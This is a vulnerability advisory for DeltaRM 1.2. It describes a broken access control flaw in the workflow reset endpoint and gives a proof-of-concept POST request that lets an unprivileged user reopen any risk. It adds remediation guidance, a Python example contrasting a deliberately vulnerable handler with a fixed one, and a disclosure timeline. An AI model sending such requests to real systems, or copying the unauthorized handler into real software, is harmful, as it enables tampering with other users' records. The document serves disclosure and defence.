=======================================================================
- Broken Access Controls in Reopen Risks
- Affected Product: DeltaRM 1.2
- Vendor: DeltaRM
- Severity: High
- Vulnerability Class: Broken Access Controls
- Status: Fixed
- Author(s): Renato Cruz
=======================================================================

The /risque/risque/workflow/reset endpoint lacks access controls: an authenticated but unprivileged user can reopen any risk with a single POST request, identifying the target risk with the risqueId parameter.
As an authenticated user, send the following request:

POST /risque/risque/workflow/reset HTTP/1.1
Host: deltarm.com
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=*unprivileged user session id*

risqueId=*risk id*

The application must validate the current user's roles and permissions on every request and guarantee that the user only has access to the features and context allowed for that user.
- With the exception of public resources, deny by default.
- Log access control failures, alert admins when appropriate (e.g. repeated failures).
- Rate limit API and controller access to minimize the harm from automated attack tooling.
- JWTs should be invalidated on the server after logout.
- Developers and QA staff should include functional access control unit and integration tests.
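The following added example (not DeltaRM code; the session store, role names and risk table are assumed) contrasts a reset handler with the missing check described above against one that denies by default, authorizes before touching the record, and logs every refused attempt:

```python
import logging
from dataclasses import dataclass

log = logging.getLogger("workflow.reset")

@dataclass
class User:
    username: str
    roles: frozenset  # assumed role model; DeltaRM's real roles are not known

@dataclass
class Risk:
    risque_id: int
    status: str

# Constructed sample data: two sessions (one privileged, one not) and two closed risks.
SESSIONS = {
    "sess-manager": User("alice", frozenset({"risk_manager"})),
    "sess-reader": User("bob", frozenset({"reader"})),
}

def make_risks():
    return {42: Risk(42, "closed"), 43: Risk(43, "closed")}

def reset_workflow_vulnerable(session_id, form, risks):
    """Behaviour the advisory describes: authentication only, no authorization."""
    if session_id not in SESSIONS:
        return 401
    risk = risks.get(int(form.get("risqueId", -1)))
    if risk is None:
        return 404
    risk.status = "open"          # any logged-in user reopens any risk
    return 200

def reset_workflow_fixed(session_id, form, risks):
    """Deny by default: only the assumed 'risk_manager' role may reopen a risk."""
    user = SESSIONS.get(session_id)
    if user is None:
        return 401
    try:
        risque_id = int(form["risqueId"])
    except (KeyError, ValueError):
        return 400
    # Authorize before looking the record up, so an unprivileged caller cannot
    # use the 403/404 difference to enumerate which risk ids exist.
    if "risk_manager" not in user.roles:
        log.warning("access denied user=%s action=workflow/reset risqueId=%s",
                    user.username, risque_id)   # feed for repeated-failure alerting
        return 403
    risk = risks.get(risque_id)
    if risk is None:
        return 404
    risk.status = "open"
    return 200
```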

- 26-10-2021: Vulnerability disclosed to DeltaRM
- 28-10-2021: Acknowledgement from vendor
- 11-12-2021: Fix released by the vendor
- 10-01-2022: Retest performed, vulnerability fixed